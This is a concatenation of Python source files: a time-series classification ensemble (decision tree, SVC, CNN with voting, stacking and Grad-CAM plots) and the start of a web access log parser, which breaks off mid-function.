""" def __init__(self): # DTC pipeline featuriser = Featuriser() dtc = DecisionTreeClassifier() self.dtc_pipe = Pipeline([('featuriser', featuriser), ('dtc', dtc)]) # SVC pipeline scaler = TimeSeriesScalerMeanVariance(kind='constant') flattener = Flattener() svc = SVC() self.svc_pipe = Pipeline([('scaler', scaler), ('flattener', flattener), ('svc', svc)]) # Keras pipeline #len_filter = round(len_input*0.05) #num_filter = 8 cnn = KerasClassifier(build_fn=build_cnn, epochs=100, verbose=0) self.cnn_pipe = Pipeline([('scaler', scaler), ('cnn', cnn)]) # Meta classifier self.meta_dtc = DecisionTreeClassifier() self.meta_svc = SVC() def fit(self, X, y, stacked): """ Fit each individual estimator of the ensemble model according to the given training data. Parameters ---------- X : array-like of shape (n_samples, n_features, n_channels) Training samples. y : array-like of shape (n_samples,) True labels for X. stacked: bool If true train a meta classifier on kfold CV predictions of the level 1 classifiers Returns ------- self: object Fitted model """ # Fit DTC # Do GridSearch to get best model param_grid = {'featuriser__windows': [1, 2, 3, 4, 5, 6], 'dtc__max_depth': [3, 4, 5], 'dtc__criterion': ['gini', 'entropy']} grid = GridSearchCV(self.dtc_pipe, param_grid, cv=5, refit=True, verbose=2, n_jobs=-1) grid.fit(X, y) # Save results df_results = pd.DataFrame.from_dict(data=grid.cv_results_) df_results.to_csv("results\\dtc.csv",index=False) print(grid.best_params_) # Take best model self.dtc_pipe = grid.best_estimator_ # Plot the dtc #plot_dtc(self.dtc_pipe['dtc']) # Save the model with open("models\\dtc_pipe.pkl", 'wb') as file: pickle.dump(self.dtc_pipe, file) # Fit SVC # Do GridSearch to get best model param_grid = {'svc__C': [10, 100, 1000, 10000], 'svc__gamma': [0.01, 0.001, 0.0001, 0.00001], 'svc__degree': [2, 3], 'svc__kernel': ['rbf', 'linear', 'poly']} grid = GridSearchCV(self.svc_pipe, param_grid, cv=5, refit=True, verbose=2, n_jobs=-1) grid.fit(X, y) # Save results 
df_results = pd.DataFrame.from_dict(data=grid.cv_results_) df_results.to_csv("results\\svc.csv",index=False) print(grid.best_params_) # Take best model self.svc_pipe = grid.best_estimator_ # Save the model with open("models\\svc_pipe.pkl", 'wb') as file: pickle.dump(self.dtc_pipe, file) # Fit CNN # Do GridSearch to get best model param_grid = {'cnn__num_channels':[X.shape[2]], 'cnn__len_input':[X.shape[1]], 'cnn__num_classes':[np.unique(y).shape[0]], 'cnn__batch_size': [20, 30], 'cnn__num_filter': [4, 8, 16], 'cnn__num_layer': [1, 2], 'cnn__len_filter': [0.05, 0.1, 0.2]} # len_filter is defined as fraction of input_len grid = GridSearchCV(self.cnn_pipe, param_grid, cv=5, refit=True, verbose=2, n_jobs=-1) grid.fit(X, y) # Save results df_results = pd.DataFrame.from_dict(data=grid.cv_results_) df_results.to_csv("results\\cnn.csv",index=False) print(grid.best_params_) # Take best model self.cnn_pipe = grid.best_estimator_ # Save the model self.cnn_pipe['cnn'].model.save("models\\cnn.h5") # Fit the Metaclassifiers if stacked: # Get level 1 classifier predictions as training data X_stacked, y_stacked = kfoldcrossval(self, X, y, k=5) # Fit Meta DTC self.meta_dtc.fit(X_stacked, y_stacked) # Save the model with open("models\\meta_dtc.pkl", 'wb') as file: pickle.dump(self.meta_dtc, file) # Fit Meta SVC self.meta_svc.fit(X_stacked, y_stacked) # Save the model with open("models\\meta_svc.pkl", 'wb') as file: pickle.dump(self.meta_svc, file) return self def predict(self, X, voting='veto'): """ Perform a classification on samples in X. Parameters ---------- X : array-like of shape (n_samples, n_features, n_channels) Test samples. 
voting: string Voting scheme to use Returns ------- y_pred: array, shape (n_samples,) Predictions y_pred_ens: array, shape (n_samples, 3) Predictions of the individual estimators """ y_pred = np.empty(np.shape(X)[0]) # Parallelize this part y_dtc = self.dtc_pipe.predict(X) y_svc = self.svc_pipe.predict(X) y_cnn = self.cnn_pipe.predict(X) y_pred_ens = np.stack([y_dtc, y_svc, y_cnn], axis=1).astype(int) if voting == 'veto': for i in range(np.shape(X)[0]): if y_dtc[i] == y_svc[i] == y_cnn[i]: y_pred[i] = y_dtc[i] else: y_pred[i] = -1 if voting == 'democratic': for i in range(np.shape(X)[0]): y_pred[i] = np.argmax(np.bincount(y_pred_ens[i, :])) if voting == 'meta_dtc': y_pred = self.meta_dtc.predict(y_pred_ens) if voting == 'meta_svc': y_pred = self.meta_svc.predict(y_pred_ens) return y_pred, y_pred_ens def kfoldcrossval(model, X, y, k=5): """ Performs another cross-validation with the optimal models in order to get the level 1 predictions to train the meta classifier. Parameters ---------- model: object Ensemble classifier object X : array-like of shape (n_samples, n_features, n_channels) Samples. y : array-like of shape (n_samples,) True labels for X. 
k: int Number of splits Returns ------- X_stack: array-like of shape (n_samples, n_features) Level 1 predictions as training data for metaclassifier y_stack: array-like of shape (n_samples,) Targets for metaclassifier """ kfold = StratifiedKFold(n_splits=k, shuffle=True, random_state=42) X_stack = np.empty((0, 3)) y_stack = np.empty((0,)) # Make a copy of the already fitted classifiers (to not overwrite the originals) dtc_temp = clone(model.dtc_pipe) svc_temp = clone(model.svc_pipe) cnn_temp = clone(model.cnn_pipe) # Train classifiers agin in kfold crossvalidation to get level 1 predictions for train, test in kfold.split(X, y): # Train all models on train dtc_temp.fit(X[train], y[train]) svc_temp.fit(X[train], y[train]) cnn_temp.fit(X[train], y[train]) # Test all on test y0 = dtc_temp.predict(X[test]) y1 = svc_temp.predict(X[test]) y2 = cnn_temp.predict(X[test]) # Concatenate predictions of individual classifier a = np.stack((y0, y1, y2), axis=-1).astype(int) # Concatenate with predictions from other splits X_stack = np.vstack((X_stack, a)) y_stack = np.hstack((y_stack, y[test])) return X_stack, y_stack def build_cnn(num_filter, len_filter, num_layer, num_channels, len_input, num_classes): """ Function returning a keras model. 
Parameters ---------- num_filter: int Number of filters / kernels in the conv layer len_filter: float Length of the filters / kernels in the conv layer as fraction of inputlength num_layer: int Number of convlutional layers in the model num_channels: int Number of channels of the input len_input: int Number of dimensions of the input num_classes: int Number of classes in the dataset = Number of outputs Returns ------- model: sequential keras model Keras CNN model ready to be trained """ model = Sequential() # First Conv Layer model.add(Conv1D(filters=num_filter, kernel_size=int(len_filter*len_input), strides=1, padding="same", activation='relu', input_shape=(len_input, num_channels), name='block1_conv1')) model.add(MaxPooling1D(pool_size=2, strides=2, padding="same", name='block1_pool')) # Other Conv Layers for l in range(2, num_layer + 1): model.add(Conv1D(filters=num_filter*l, kernel_size=int(len_filter * len_input), strides=1, padding="same", activation='relu', name='block' + str(l) + '_conv1')) model.add(MaxPooling1D(pool_size=2, strides=2, padding="same", name='block' + str(l) + '_pool')) model.add(Flatten(name='flatten')) model.add(Dense(100, activation='relu', name='fc1')) model.add(Dense(num_classes, activation='softmax',name='predictions')) model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy']) plot_model(model,dpi = 300, show_shapes=True, to_file='models\\cnn.png') return model
Python
411
36.114357
114
/src/alpaca.py
0.585945
0.575062
sebastianden/alpaca
refs/heads/master
import matplotlib.pyplot as plt from sklearn.metrics import confusion_matrix from sklearn.utils.multiclass import unique_labels from scipy.stats import kurtosis, skew import numpy as np import pandas as pd from sklearn.base import TransformerMixin, BaseEstimator from sklearn import tree import graphviz # Load the testbench data def load_test(): df = pd.read_pickle('data\\df_test.pkl') pivoted = df.pivot(index='sample_nr',columns='idx') X = np.stack([pivoted['position'].values, pivoted['velocity'].values, pivoted['current'].values], axis=2) y = df.groupby('sample_nr').target.first().values return X, y # Load any dataset (WARNING: predefined length!) def load_data(dataset): if dataset == 'test': X, y = load_test() sz = 230 elif dataset == 'uc1': X, y = split_df(pd.read_pickle('data\\df_uc1.pkl'), index_column='run_id', feature_columns=['fldPosition', 'fldCurrent'], target_name='target') # Length of timeseries for resampler and cnn sz = 38 elif dataset == 'uc2': X, y = split_df(pd.read_pickle('data\\df_uc2.pkl'), index_column='run_id', feature_columns=['position', 'force'], target_name='label') # Length of timeseries for resampler and cnn sz = 200 resampler = TimeSeriesResampler(sz=sz) X = resampler.fit_transform(X, y) y = np.array(y) return X, y # Load and split UC1 and UC2 datasets def split_df(df,index_column, feature_columns, target_name): labels = [] features = [] for id_, group in df.groupby(index_column): features.append(group[feature_columns].values.tolist()) labels.append(group[target_name].iloc[0]) return features, labels # Function to plot confusion matrix def plot_confusion_matrix(y_true, y_pred, classes, normalize=False, title=None, cmap=plt.cm.Blues): """ This function prints and plots the confusion matrix. Normalization can be applied by setting `normalize=True`. 
""" if not title: if normalize: title = 'Normalized confusion matrix' else: title = 'Confusion matrix, without normalization' # Compute confusion matrix cm = confusion_matrix(y_true, y_pred) # Only use the labels that appear in the data classes = classes[unique_labels(y_true, y_pred)] """ if normalize: cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis] print("Normalized confusion matrix") else: print('Confusion matrix, without normalization') print(cm) """ fig, ax = plt.subplots() im = ax.imshow(cm, interpolation='nearest', cmap=cmap) #ax.figure.colorbar(im, ax=ax) # We want to show all ticks... ax.set(xticks=np.arange(cm.shape[1]), yticks=np.arange(cm.shape[0]), # ... and label them with the respective list entries xticklabels=classes, yticklabels=classes, ylabel='True label', xlabel='Predicted label') # Matplotlib 3.1.1 bug workaround ax.set_ylim(len(cm)-0.5, -0.5) # Rotate the tick labels and set their alignment. plt.setp(ax.get_xticklabels(), rotation=45, ha="right", rotation_mode="anchor") # Loop over data dimensions and create text annotations. fmt = '.2f' if normalize else 'd' thresh = cm.max() / 2. for i in range(cm.shape[0]): for j in range(cm.shape[1]): ax.text(j, i, format(cm[i, j], fmt), ha="center", va="center", color="white" if cm[i, j] > thresh else "black") fig.tight_layout() return ax def to_time_series_dataset(dataset): """Transforms a time series dataset so that it has the following format: (no_time_series, no_time_samples, no_features) Parameters ---------- dataset : array-like The dataset of time series to be transformed. 
Returns ------- numpy.ndarray of shape (no_time_series, no_time_samples, no_features) """ assert len(dataset) != 0, 'dataset is empty' try: np.array(dataset, dtype=np.float) except ValueError: raise AssertionError('All elements must have the same length.') if np.array(dataset[0]).ndim == 0: dataset = [dataset] if np.array(dataset[0]).ndim == 1: no_time_samples = len(dataset[0]) no_features = 1 else: no_time_samples, no_features = np.array(dataset[0]).shape return np.array(dataset, dtype=np.float).reshape( len(dataset), no_time_samples, no_features) def to_dataset(dataset): """Transforms a time series dataset so that it has the following format: (no_time_series, no_time_samples, no_features) where no_time_samples for different time sereies can be different. Parameters ---------- dataset : array-like The dataset of time series to be transformed. Returns ------- list of np.arrays (no_time_series, no_time_samples, no_features) """ assert len(dataset) != 0, 'dataset is empty' if np.array(dataset[0]).ndim == 0: dataset = [[d] for d in dataset] if np.array(dataset[0]).ndim == 1: no_features = 1 dataset = [[[d] for d in data] for data in dataset] else: no_features = len(dataset[0][0]) for data in dataset: try: array = np.array(data, dtype=float) except ValueError: raise AssertionError( "All samples must have the same number of features!") assert array.shape[-1] == no_features,\ 'All series must have the same no features!' return dataset class TimeSeriesResampler(TransformerMixin): """Resampler for time series. Resample time series so that they reach the target size. Parameters ---------- no_output_samples : int Size of the output time series. 
""" def __init__(self, sz): self._sz = sz def fit(self, X, y=None, **kwargs): return self def _interp(self, x): return np.interp( np.linspace(0, 1, self._sz), np.linspace(0, 1, len(x)), x) def transform(self, X, **kwargs): X_ = to_dataset(X) res = [np.apply_along_axis(self._interp, 0, x) for x in X_] return to_time_series_dataset(res) class TimeSeriesScalerMeanVariance(TransformerMixin): """Scaler for time series. Scales time series so that their mean (resp. standard deviation) in each dimension. The mean and std can either be constant (one value per feature over all times) or time varying (one value per time step per feature). Parameters ---------- kind: str (one of 'constant', or 'time-varying') mu : float (default: 0.) Mean of the output time series. std : float (default: 1.) Standard deviation of the output time series. """ def __init__(self, kind='constant', mu=0., std=1.): assert kind in ['time-varying', 'constant'],\ 'axis should be one of time-varying or constant' self._axis = (1, 0) if kind == 'constant' else 0 self.mu_ = mu self.std_ = std def fit(self, X, y=None, **kwargs): X_ = to_time_series_dataset(X) self.mean_t = np.mean(X_, axis=self._axis) self.std_t = np.std(X_, axis=self._axis) self.std_t[self.std_t == 0.] = 1. return self def transform(self, X, **kwargs): """Fit to data, then transform it. Parameters ---------- X Time series dataset to be rescaled Returns ------- numpy.ndarray Rescaled time series dataset """ X_ = to_time_series_dataset(X) X_ = (X_ - self.mean_t) * self.std_ / self.std_t + self.mu_ return X_ class Flattener(TransformerMixin): """Flattener for time series. Reduces the dataset by one dimension by flattening the channels""" def __init__(self): pass def fit(self,X, y=None, **kwargs): return self def transform(self, X, **kwargs): """Transform data. 
Parameters ---------- X Time series dataset to be rescaled Returns ------- numpy.ndarray Flattened time series dataset """ X_ = X.transpose(0, 2, 1).reshape(X.shape[0],-1) return X_ class Differentiator(TransformerMixin): """Calculates the derivative of a specified channel and and appends it as new channel""" def __init__(self, channel): """Initialise Featuriser. Parameters ---------- channel int, channel to calculate derivative from """ self.channel = channel def fit(self,X, y=None, **kwargs): return self def transform(self, X, **kwargs): """Transform data. Parameters ---------- X Time series dataset Returns ------- numpy.ndarray Time series dataset with new channel """ dt = np.diff(X[:, :, self.channel], axis=1, prepend=X[0, 0, self.channel]) X = np.concatenate((X, np.expand_dims(dt, axis=2)), axis=2) return X class Featuriser(TransformerMixin, BaseEstimator): """Featuriser for time series. Calculates a set of statistical measures on each channel and each defined window of the dataset and returns a flattened matrix to train sklearn models on""" def __init__(self, windows=1): """Initialise Featuriser. Parameters ---------- windows int, number of windows to part the time series in """ self.windows = windows def fit(self,X, y=None, **kwargs): return self def transform(self, X, **kwargs): """Transform data. Parameters ---------- X Time series dataset to be rescaled Returns ------- numpy.ndarray Featurised time series dataset """ X_ = np.empty((X.shape[0], 0)) for i in range(X.shape[2]): for window in np.array_split(X[:, :, i], self.windows, axis=1): mean = np.mean(window, axis=1) std = np.std(window, axis=1) min_d = np.min(window, axis=1) min_loc = np.argmin(window, axis=1) max_d = np.max(window, axis=1) max_loc = np.argmax(window, axis=1) # Concatenate all values to a numpy array row = [mean, std, min_d, min_loc, max_d, max_loc] row = np.transpose(np.vstack(row)) X_ = np.hstack([X_, row]) return X_ class Featuriser2(TransformerMixin): """Deprecated. 
Featuriser for time series. Calculates a set of statistical measures on each channel of the dataset and returns a flattened matrix to train sklearn models on""" def __init__(self): pass def fit(self,X, y=None, **kwargs): return self def transform(self, X, **kwargs): """Transform data. Parameters ---------- X Time series dataset to be rescaled Returns ------- numpy.ndarray Featurised time series dataset """ X_ = np.empty((X.shape[0], 0)) for i in range(X.shape[2]): table = np.empty((0, 14)) for x in X[:, :, i]: mean = np.mean(x) var = np.var(x) max_d = x.max() max_loc = np.argmax(x) min_d = x.min() min_loc = np.argmin(x) range_d = max_d - min_d med = np.median(x) first = x[0] last = x[-1] skew_d = skew(x) kurt = kurtosis(x) sum = np.sum(x) mean_abs_change = np.mean(np.abs(np.diff(x))) # Concatenate all values to a numpy array row = [mean, var, med, first, last, range_d, min_d, min_loc, max_d, max_loc, skew_d, kurt, sum, mean_abs_change] row = np.hstack(row) table = np.vstack([table, row]) X_ = np.hstack((X_,table)) return X_ class Cutter(TransformerMixin): """Cuts the last part of the curves.""" def fit(self, X, y=None, **kwargs): return self def transform(self, X, **kwargs): """Transform data. 
Parameters ---------- X Time series dataset to be rescaled Returns ------- list Cut time series dataset """ res = [] for x in X: idx = np.argmax(np.array(x)[:, 0]) res.append(x[:idx]) return res def plot_dtc(dtc): feature_names = [] #channels = ["$pos","$vel","$cur"] # test case #channels = ["$pos","$cur"] # use case 1 #channels = ["$pos","$cur","$vel"] # use case 1 with derived velocity channels = ["$pos","$for"] # use case 2 for var in channels: for i in range(1,int((dtc.n_features_/6/len(channels))+1)): for f in ["{mean}$","{std}$","{min}$","{min-ind}$","{max}$","{max-ind}$"]: feature_names.append('{0}^{1}_{2}'.format(var,i,f)) #target_names = ["0","1","2","3","4"] # test case target_names = ["0","1","2","3"] # use case 1 + 2 dot_data = tree.export_graphviz(dtc, out_file=None, feature_names=feature_names, class_names=target_names, filled=False, rounded=True, special_characters=True) graph = graphviz.Source(dot_data) graph.format = 'svg' graph.render("models\\dtc")
Python
444
30.774775
111
/src/utils.py
0.548341
0.540261
sebastianden/alpaca
refs/heads/master
from alpaca import Alpaca from utils import load_test, split_df, TimeSeriesResampler,confusion_matrix import time from sklearn.model_selection import train_test_split from sklearn.utils import shuffle from sklearn.pipeline import Pipeline import numpy as np import pandas as pd if __name__ == '__main__': X, y = load_test() # Length of timeseries for resampler and cnn sz = 230 # Number of channels for cnn num_channels = X.shape[-1] # Number of classes for cnn num_classes = np.unique(y).shape[0] classes = np.array(["0", "1", "2", "3", "4", "?"]) repetitions = 1 results = [] outliers = np.empty((0, 230*3+5)) for r in range(repetitions): print("Repetition #",r) X, y = shuffle(X, y, random_state=r) # Turn y to numpy array y = np.array(y) # Split into train and test sets X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, stratify=y, random_state=r) for votingstr in ["democratic", "veto", "stacked_svc", "stacked_dtc"]: if votingstr == 'stacked_svc': meta = 'svc' elif votingstr == 'stacked_dtc': meta = 'dtc' if votingstr == 'stacked_svc' or votingstr == 'stacked_dtc': voting = 'stacked' stacked = True else: stacked = False voting = votingstr meta = None # Build pipeline from resampler and estimator resampler = TimeSeriesResampler(sz=sz) alpaca = Pipeline([('resampler', resampler), ('classifier', Alpaca())]) alpaca.fit(X_train, y_train, classifier__stacked=stacked, classifier__n_clusters=100) y_pred_bin, y_pred = alpaca.predict(X_test, voting=voting) # Plot confusion matrix (Binary) y_test_bin = np.copy(y_test) y_test_bin[y_test_bin > 0] = 1 tn, fp, fn, tp = confusion_matrix(y_test_bin, y_pred_bin).ravel() # Append overall error results.append([votingstr, r, 'err', (fp+fn)/(tn+fp+fn+tp)]) # Append false negative rate results.append([votingstr, r, 'fnr', fn/(fn+tp)]) # Append false positive rate results.append([votingstr, r, 'fpr', fp/(fp+tn)]) # Save misclassified samples (with y_pred,y_pred_bin, y_true, and voting scheme) idx = np.where(y_test_bin != 
y_pred_bin) # Flattened curves curves = X_test[idx].transpose(0, 2, 1).reshape(X_test[idx].shape[0],-1) vote_type = np.array([votingstr for i in range(idx[0].shape[0])]).reshape((-1,1)) wrong = np.hstack([curves, y_pred[idx].reshape((-1,1)),y_test[idx].reshape((-1,1)), y_pred_bin[idx].reshape((-1,1)),y_test_bin[idx].reshape((-1,1)), vote_type]) outliers = np.vstack((outliers,wrong)) df = pd.DataFrame(outliers) df.to_csv("..\\results\\OutliersVotingTest.csv") df = pd.DataFrame(results, columns=['voting', 'test', 'metric', 'value']) df.to_csv("..\\results\\VotingTest.csv")
Python
87
35.793102
108
/src/test_voting.py
0.561037
0.548236
sebastianden/alpaca
refs/heads/master
import pandas as pd import numpy as np from mpl_toolkits.mplot3d import Axes3D import matplotlib.pyplot as plt from matplotlib import cm def univariant(df, param, quantity='mean_test_score'): unique = df[param].unique() scores = [] for i in unique: scores.append(df[df[param] == i][quantity].mean()) plt.plot(unique, scores) plt.show() def multivariant(df, param1, param2,quantity='mean_test_score'): unique1 = df[param1].unique() unique2 = df[param2].unique() unique1, unique2 = np.meshgrid(unique1, unique2) scores = np.zeros(unique1.shape) for i, p1 in enumerate(unique1[0]): for j, p2 in enumerate(unique2[0]): scores[i, j] = df[(df[param1] == p1) & (df[param2] == p2)][quantity].values.mean() fig = plt.figure() ax = fig.gca(projection='3d') surf = ax.plot_surface(unique1, unique2, scores, cmap=cm.coolwarm, linewidth=0, antialiased=False) ax.set_xlabel(param1) ax.set_ylabel(param2) ax.set_zlabel("Accuracy") plt.show() df = pd.read_csv("..\\results\\cnn.csv") univariant(df, param='param_cnn__len_filter',quantity='mean_score_time')
Python
39
28.410257
102
/src/gridsearch_results.py
0.657068
0.631763
sebastianden/alpaca
refs/heads/master
import tensorflow.keras.backend as K import tensorflow.keras from tensorflow.keras.layers import Lambda from tensorflow.keras.models import Model, load_model tensorflow.compat.v1.disable_eager_execution() import tensorflow as tf import pandas as pd import numpy as np import matplotlib.pyplot as plt from utils import to_time_series_dataset, split_df, load_test, TimeSeriesResampler, TimeSeriesScalerMeanVariance from scipy.interpolate import interp1d import seaborn as sns sns.set(style='white',font='Palatino Linotype',font_scale=1,rc={'axes.grid' : False}) def get_model(id): model = load_model('.\\models\\cam_cnn_'+id+'.h5') return model def target_category_loss(x, category_index, nb_classes): return tf.multiply(x, K.one_hot([category_index], nb_classes)) def target_category_loss_output_shape(input_shape): return input_shape def normalize(x): # utility function to normalize a tensor by its L2 norm return x / (K.sqrt(K.mean(K.square(x))) + 1e-5) def load_data(dataset): if dataset == 'test': X, y = load_test() sz = 230 elif dataset == 'uc1': X, y = split_df(pd.read_pickle('..\\data\\df_uc1.pkl'), index_column='run_id', feature_columns=['fldPosition', 'fldCurrent'], target_name='target') # Length of timeseries for resampler and cnn sz = 38 elif dataset == 'uc2': X, y = split_df(pd.read_pickle('..\\data\\df_uc2.pkl'), index_column='run_id', feature_columns=['position', 'force'], target_name='label') # Length of timeseries for resampler and cnn sz = 200 resampler = TimeSeriesResampler(sz=sz) X = resampler.fit_transform(X, y) y = np.array(y) return X, y def get_sample(X, y, label, rs=100): s = np.random.RandomState(rs) s = s.choice(np.where(y == label)[0], 1) x_raw = to_time_series_dataset(X[s, :, :]) scaler = TimeSeriesScalerMeanVariance(kind='constant') X = scaler.fit_transform(X) x_proc = to_time_series_dataset(X[s, :, :]) return x_proc, x_raw def _compute_gradients(tensor, var_list): grads = tf.gradients(tensor, var_list) return [grad if grad is not None else 
tf.zeros_like(var) for var, grad in zip(var_list, grads)] def grad_cam(input_model, data, category_index, nb_classes, layer_name): # Lambda function for getting target category loss target_layer = lambda x: target_category_loss(x, category_index, nb_classes) # Lambda layer for function x = Lambda(target_layer, output_shape = target_category_loss_output_shape)(input_model.output) # Add Lambda layer as output to model model = Model(inputs=input_model.input, outputs=x) #model.summary() # Function for getting target category loss y^c loss = K.sum(model.output) # Get the layer with "layer_name" as name conv_output = [l for l in model.layers if l.name == layer_name][0].output # Define function to calculate gradients grads = normalize(_compute_gradients(loss, [conv_output])[0]) gradient_function = K.function([model.input], [conv_output, grads]) # Calculate convolution layer output and gradients for datasample output, grads_val = gradient_function([data]) output, grads_val = output[0, :], grads_val[0, :, :] # Calculate the neuron importance weights as mean of gradients weights = np.mean(grads_val, axis = 0) # Calculate CAM by multiplying weights with the respective output cam = np.zeros(output.shape[0:1], dtype = np.float32) for i, w in enumerate(weights): cam += w * output[:, i] # Interpolate CAM to get it back to the original data resolution f = interp1d(np.linspace(0, 1, cam.shape[0]), cam, kind="slinear") cam = f(np.linspace(0,1,data.shape[1])) # Apply ReLU function to only get positive values cam[cam < 0] = 0 return cam def plot_grad_cam(cam, raw_input, cmap, alpha, language='eng'): fig, ax = plt.subplots(raw_input.shape[-1], 1, figsize=(15, 9), sharex=True) # fig.suptitle('Gradient Class Activation Map for sample of class %d' %predicted_class) if language == 'eng': ax_ylabel = [r"Position $\mathit{z}$ in mm", r"Velocity $\mathit{v}$ in m/s", r"Current $\mathit{I}$ in A"] if language == 'ger': ax_ylabel = [r"Position $\mathit{z}$ in mm", r"Geschwindigkeit $\mathit{v}$ 
in m/s", r"Stromstärke $\mathit{I}$ in A"] for i, a in enumerate(ax): left, right = (-1, raw_input.shape[1] + 1) range_input = raw_input[:, :, i].max() - raw_input[:, :, i].min() down, up = (raw_input[:, :, i].min() - 0.1 * range_input, raw_input[:, :, i].max() + 0.1 * range_input) a.set_xlim(left, right) a.set_ylim(down, up) a.set_ylabel(ax_ylabel[i]) im = a.imshow(cam.reshape(1, -1), extent=[left, right, down, up], aspect='auto', alpha=alpha, cmap=cmap) a.plot(raw_input[0, :, i], linewidth=2, color='k') fig.subplots_adjust(right=0.8) cbar_ax = fig.add_axes([0.85, 0.15, 0.05, 0.7]) cbar = fig.colorbar(im, cax=cbar_ax) if language == 'eng': cbar_ax.set_ylabel('Activation', rotation=90, labelpad=15) if language == 'ger': cbar_ax.set_ylabel('Aktivierung', rotation=90, labelpad=15) return ax if __name__ == "__main__": X, y = load_data('test') nb_classes = np.unique(y).shape[0] # Load model and datasample preprocessed_input, raw_input = get_sample(X, y, label=1) model = get_model('test') # Get prediction predictions = model.predict(preprocessed_input) predicted_class = np.argmax(predictions) print('Predicted class: ', predicted_class) # Calculate Class Activation Map cam = grad_cam(model, preprocessed_input, predicted_class, nb_classes, 'block2_conv1') ax = plot_grad_cam(cam, raw_input, 'jet', 1) plt.show()
Python
152
38.144737
126
/src/cam.py
0.637372
0.623257
siguangzong/Web_Log_Tool
refs/heads/master
# -*- coding:utf-8 -*- import os import re import json import time import traceback import datetime from collections import Counter from numpy import var, average, percentile from bin.util import get_dir_files from bin.config import config from bin.report import generate_web_log_parser_report from bin.report import generate_web_log_parser_urls from bin.report import update_index_html class URLData: def __init__(self, url=None, pv=None, ratio=None, peak=None): self.url = url self.pv = pv self.ratio = ratio self.peak = peak self.time = [] self.cost = [] self.cost_time = {'p9': None, 'p8': None, 'p5': None, 'avg': None, 'variance': None} def get_data(self): return {'url': self.url, 'pv': self.pv, 'ratio': self.ratio, 'peak': self.peak, 'cost_time': self.cost_time} def parse_log_format(): log_format_index = {} log_format_list = config.log_format.split() for item in log_format_list: if item == 'ip': log_format_index.setdefault('ip_index', log_format_list.index(item) + 1) if item == 'real_ip': log_format_index.setdefault('real_ip_index', log_format_list.index(item) + 1) if item == 'datetime': log_format_index.setdefault('time_index', log_format_list.index(item) + 1) if item == 'url': log_format_index.setdefault('url_index', log_format_list.index(item) + 1) if item == 'method': log_format_index.setdefault('method_index', log_format_list.index(item) + 1) if item == 'protocol': log_format_index.setdefault('protocol_index', log_format_list.index(item) + 1) if item == 'cost': log_format_index.setdefault('cost_time_index', log_format_list.index(item) + 1) if item == 'status': log_format_index.setdefault('status', log_format_list.index(item) + 1) if 'real_ip_index' in log_format_index.keys(): log_format_index.setdefault('host_index', log_format_list.index('real_ip') + 1) else: log_format_index.setdefault('host_index', log_format_list.index('ip') + 1) return log_format_index def not_static_file(url): url_front = url.split('?')[0] if url_front.split('.')[-1] not in 
config.static_file: return True else: return False def is_ignore_url(url): url_front = url.split('?')[0] if url_front not in config.ignore_urls: return False else: return True def get_new_url_with_parameters(origin_url): origin_url_list = origin_url.split('?') if len(origin_url_list) == 1: return origin_url url_front = origin_url_list[0] url_parameters = sorted(origin_url_list[1].split('&')) new_url_parameters = [] for parameter in url_parameters: parameter_list = parameter.split('=') key = parameter_list[0] if len(parameter_list) == 1: new_url_parameters.append(parameter) elif key in config.custom_keys: new_url_parameters.append(key + '=' + config.custom_parameters.get(key)) elif key in config.fixed_parameter_keys: new_url_parameters.append(parameter) else: new_url_parameters.append(key + '=' + '{' + key + '}') new_url = url_front + '?' + '&amp;'.join(new_url_parameters) return new_url def get_new_url_for_always_parameters(origin_url): origin_url_list = origin_url.split('?') if len(origin_url_list) == 1: return origin_url_list[0] url_front = origin_url_list[0] url_parameters = sorted(origin_url_list[1].split('&')) new_url_parameters = [] for parameter in url_parameters: key = parameter.split('=')[0] if key in config.always_parameter_keys: new_url_parameters.append(parameter) if new_url_parameters: new_url = url_front + '?' + '&amp;'.join(new_url_parameters) else: new_url = url_front return new_url def ignore_url_suffix(origin_url): # origin_url = str(origin_url, encoding="utf-8") origin_url_list = origin_url.split('?') if len(origin_url_list) == 1: uri_parameter = None else: uri_parameter = origin_url_list[1:] uri = origin_url_list[0] new_uri = uri for suffix in config.ignore_url_suffix: if uri.endswith(suffix): new_uri = uri.replace(suffix, '') break if uri_parameter: return new_uri + '?' 
+ '?'.join(uri_parameter) else: return new_uri def get_url(match, log_format): origin_url = ignore_url_suffix(match.group(log_format.get('url_index'))) if config.is_with_parameters: url = get_new_url_with_parameters(origin_url) else: if config.always_parameter_keys: url = get_new_url_for_always_parameters(origin_url) else: url = match.group(origin_url.split('?')[0].split('.json')[0]) return url def parse_log_file(target_file, log_format): # 用户IP hosts = [] # 访问时间 times = [] # 访问时间中的小时 hours = [] # 访问时间中的分钟 minutes = [] # 请求URL urls = [] # 请求响应时间 cost_time_list = [] cost_time_flag = False cost_time_percentile_flag = False if 'cost_time_index' in log_format.keys(): if config.cost_time_flag: cost_time_flag = True if config.cost_time_percentile_flag: cost_time_percentile_flag = True # 请求方法计数器 method_counts = {'post': 0, 'post_percentile': 0, 'get': 0, 'get_percentile': 0} # http status code统计 status_codes = {} pattern = re.compile(config.log_pattern) # pattern = re.compile(b'(.*?):.*?\[.*?\].*?\[(.*?)\]\s(.*?)\s(.*?)\s.*?msecs\s\((.*?)\s(.*?)\)') # 第一次读取整个文件,获取对应的请求时间、请求URL、请求方法、用户IP、请求响应时间等数据 with open('../data/' + target_file, 'rb') as f: for line in f: match = pattern.match(str(line,encoding="utf8")) if match is None: continue url = get_url(match, log_format) if is_ignore_url(url): continue match_method = match.group(log_format.get('method_index')) if match_method not in config.support_method: continue if not_static_file(url): hosts.append(match.group(log_format.get('host_index')).split(',')[0]) # log_time = time.strftime('%Y-%m-%d %H:%M:%S', time.strptime(match.group(log_format.get('time_index')), # '%d/%b/%Y:%H:%M:%S')) log_time = match.group(log_format.get('time_index')) old_time_array = time.strptime(log_time, "%a %b %d %H:%M:%S %Y") log_time= time.strftime('%d/%b/%Y:%H:%M:%S', old_time_array) times.append(log_time) log_time_list = log_time.split(':') # hours.append(':'.join(log_time_list[0:2])) hours.append(':'.join(log_time_list[1:2])) # 
